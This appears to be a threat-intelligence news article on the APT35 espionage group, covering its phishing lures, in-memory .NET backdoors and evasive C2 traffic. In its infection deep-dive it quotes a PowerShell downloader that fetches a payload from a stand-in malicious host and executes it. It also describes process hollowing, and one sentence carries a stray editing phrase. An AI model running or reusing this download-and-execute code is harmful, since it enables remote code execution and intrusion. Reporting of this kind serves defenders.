Since emerging in the mid-2010s as a persistent threat actor, the IRGC-linked APT35 collective has continually adapted its tactics to target government entities, energy firms, and diplomatic missions across the Middle East and beyond.
Initially focused on credential harvesting via targeted phishing campaigns, the group has evolved a modular toolkit capable of deep network infiltration and long-term espionage.
Its operations begin with carefully crafted spear-phishing messages that exploit legacy Office macro vulnerabilities, setting the stage for stealthy deployment of backdoors.
Cloudsek analysts noted that APT35’s toolset includes both custom and publicly available components, allowing researchers to trace distinct code fingerprints even as the adversary pivots between payloads.
After the second paragraph, Cloudsek researchers identified a correlation between the group’s use of .NET-based implants and a pronounced shift toward in-memory execution techniques, reducing disk artifacts and complicating forensic analysis.
This discovery has driven the development of tailored detection rules for network defenders.
The campaign’s impact has been significant: compromised networks have suffered data exfiltration of diplomatic communications, intellectual property theft, and strategic reconnaissance tailored to state-level objectives.
APT35’s operational security measures—including randomized C2 beaconing intervals and encrypted channels over HTTP/HTTPS—have consistently evaded traditional signature-based defenses. Victims often remain unaware of compromise for months, allowing deep data collection and lateral propagation.
The group’s espionage operations extend beyond technical tradecraft. APT35 operators conduct extensive open-source intelligence (OSINT) gathering to craft highly convincing lures, leveraging geopolitical events and professional contacts in targeted organizations.
This human-centric approach, combined with advanced malware, underscores the adversary’s adaptability and resource investment.
Infection Mechanism Deep Dive
APT35’s primary infection vector leverages weaponized Word documents containing obfuscated VBA macros designed to load a staged downloader into memory.
Upon document opening, the macro executes a PowerShell command that masquerades as a legitimate Windows Update process:-
$u = "http://malicious[.]domain/payload.bin"
$r = Invoke-WebRequest -Uri $u -UseBasicParsing
$e = [System.Text.Encoding]::UTF8.GetString($r.Content)
Invoke-Expression $eThis downloader decrypts the next-stage DLL using an AES key embedded in the VBA code. The decrypted payload, typically a .NET-compiled backdoor known as PhosphorusLoader, registers as a COM object for persistence.
It employs process hollowing to inject into svchost.exe, intermittently beaconing to a hidden C2 domain. Figure 1 illustrates this injection workflow, with the AES key stored in an encrypted resource section for evasion.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
